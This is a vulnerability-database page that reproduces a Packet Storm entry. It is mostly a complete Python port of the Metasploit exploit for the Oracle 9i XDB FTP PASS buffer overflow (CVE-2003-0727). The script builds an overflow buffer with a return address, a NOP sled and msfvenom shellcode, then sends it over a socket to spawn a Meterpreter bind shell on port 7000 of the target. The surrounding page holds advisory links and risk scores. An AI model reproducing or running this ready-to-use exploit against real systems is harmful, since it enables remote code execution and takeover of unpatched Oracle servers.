Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle 9i XDB FTP Pass Overflow

🗓️ 03 Feb 2016 00:00:00Reported by MCType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 306 Views

Oracle 9i XDB FTP PASS Overflow exploit, allows remote attackers to execute arbitrary code via a long string passed to the PASS command, leading to a stack-based buffer overflow

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Oracle 9i XDB 9.2.01 HTTP PASS Buffer Overflow Exploit
26 Sep 201700:00
zdt
0day.today		Oracle 9.2.0.1 Universal XDB HTTP Pass Overflow Exploit
8 Dec 200500:00
zdt
ATTACKERKB		CVE-2003-0727
20 Oct 200304:00
attackerkb
Circl		CVE-2003-0727
30 Apr 201000:00
circl
Check Point Advisories		Oracle Database Server XML Database Buffer Overflow (CVE-2003-0727)
12 Feb 200600:00
checkpoint_advisories
Check Point Advisories		Update Protection against Oracle XDB HTTP Buffer Overflow Vulnerability
12 Feb 200600:00
checkpoint_advisories
CVE		CVE-2003-0727
3 Sep 200304:00
cve
Cvelist		CVE-2003-0727
3 Sep 200304:00
cvelist
Exploit DB		Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)
8 Dec 200500:00
exploitdb
Exploit DB		Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
5 Oct 201000:00
exploitdb
Rows per page
`'''  
Oracle 9i XDB FTP PASS Overflow (win32)   
Ported to python from the Metasploit oracle9i_xdb_ftp_pass.rb exploit  
Original exploit:  
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb  
  
Description from original exploit:  
By passing an overly long string to the PASS command, a  
stack based buffer overflow occurs. David Litchfield, has  
illustrated multiple vulnerabilities in the Oracle 9i XML  
Database (XDB), during a seminar on "Variations in exploit  
methods between Linux and Windows" presented at the Blackhat  
conference.  
http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf  
  
CVE: 2003-0727  
OSVDB: 2449  
BID: 8375  
  
Date: 2/2/2016  
Ported by: Tom Ryans  
Tested on: Win 2000 SP4  
  
Usage: oracle9i_ftp_pass.py target_ip target_port  
ex. oracle9i_ftp_pass.py 127.0.0.1 2100  
  
Spawns meterpreter bind shell on port 7000.  
'''  
  
#!/usr/bin/python  
  
import sys, socket  
  
if len(sys.argv) != 3:  
print "Usage: %s target_ip target_port" % sys.argv[0]  
sys.exit()  
  
host = str(sys.argv[1])  
port = int(sys.argv[2])  
  
#msfvenom -p windows/meterpreter/bind_tcp lport=7000 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40" -f c  
shellcode = (  
"\xdb\xc8\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x4b\xbd\xe8\xe3\x74"  
"\x4e\x83\xc3\x04\x31\x6b\x16\x03\x6b\x16\xe2\x1d\x1f\x9c\xcc"  
"\xdd\xe0\x5d\xb1\x54\x05\x6c\xf1\x02\x4d\xdf\xc1\x41\x03\xec"  
"\xaa\x07\xb0\x67\xde\x8f\xb7\xc0\x55\xe9\xf6\xd1\xc6\xc9\x99"  
"\x51\x15\x1d\x7a\x6b\xd6\x50\x7b\xac\x0b\x98\x29\x65\x47\x0e"  
"\xde\x02\x1d\x92\x55\x58\xb3\x92\x8a\x29\xb2\xb3\x1c\x21\xed"  
"\x13\x9e\xe6\x85\x1a\xb8\xeb\xa0\xd5\x33\xdf\x5f\xe4\x95\x11"  
"\x9f\x4a\xd8\x9d\x52\x93\x1c\x19\x8d\xe6\x54\x59\x30\xf0\xa2"  
"\x23\xee\x75\x31\x83\x65\x2d\x9d\x35\xa9\xab\x56\x39\x06\xb8"  
"\x31\x5e\x99\x6d\x4a\x5a\x12\x90\x9d\xea\x60\xb6\x39\xb6\x33"  
"\xd7\x18\x12\x95\xe8\x7b\xfd\x4a\x4c\xf7\x10\x9e\xfd\x5a\x7d"  
"\x53\xcf\x64\x7d\xfb\x58\x16\x4f\xa4\xf2\xb0\xe3\x2d\xdc\x47"  
"\x03\x04\x98\xd8\xfa\xa7\xd8\xf1\x38\xf3\x88\x69\xe8\x7c\x43"  
"\x6a\x15\xa9\xf9\x61\xb0\x02\x1f\x88\x28\xa2\xb5\x71\xc5\x4e"  
"\x46\xa9\xf5\x70\x8d\xc2\x9e\x8c\x2d\xf6\x06\x18\xcb\x62\xa7"  
"\x4c\x44\x1b\x05\xab\x5d\xbc\x76\x99\x24\x82\xfc\x7a\x71\x6b"  
"\x48\x93\x45\x94\x49\xb1\xe2\x02\xc2\xd6\x37\x32\xd5\xf2\x10"  
"\x23\x42\x88\xf0\x06\xf2\x8d\xd9\xf3\xf4\x1b\xe5\x55\xa2\xb3"  
"\xe7\x80\x84\x1b\x18\xe7\x96\x5c\xe6\x76\xb4\x17\xd0\xec\x86"  
"\x4f\x1c\xe1\x06\x90\x4a\x6b\x07\xf8\x2a\xcf\x54\x1d\x35\xda"  
"\xc8\x8e\xa3\xe5\xb8\x63\x64\x8e\x46\x5d\x42\x11\xb8\x88\xd1"  
"\x56\x46\x4d\xd2\xa7\x84\x98\x1a\xd2\xe3\x18")  
  
  
user = "A" * 10  
# return address from Metasploit module: 0x60616d46 oraclient9.dll (pop/pop/ret)  
ret = "\x46\x6d\x61\x60"  
prependencoder = "\x81\xc4\xff\xef\xff\xff\x44" #from Metasploit module  
nops = "\x90" * (800 - len(shellcode) - len(prependencoder))  
  
buff = "A" * 442 + "\xeb\x06\x90\x90" + ret + nops + prependencoder + shellcode  
print " ++++++++++++++++++++++++++++++++++++++++++++"  
print " + Oracle 9i XDB FTP PASS Overflow exploit +"  
print " +++++++++++++++++++++++++++++++++++++++++++++"  
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
s.connect((host,port))  
print s.recv(1024)  
print "Sending %s size payload..." % len(buff)  
s.send("USER " + user + "\r\n")  
s.send("PASS " + buff + "\r\n")  
print "Payload sent...."  
print "Check port 7000 for meterpreter shell..."  
s.close()  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Feb 2016 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.85761
oracle 9ixdb ftppass overflowremote attackersarbitrary codebuffer overflow
306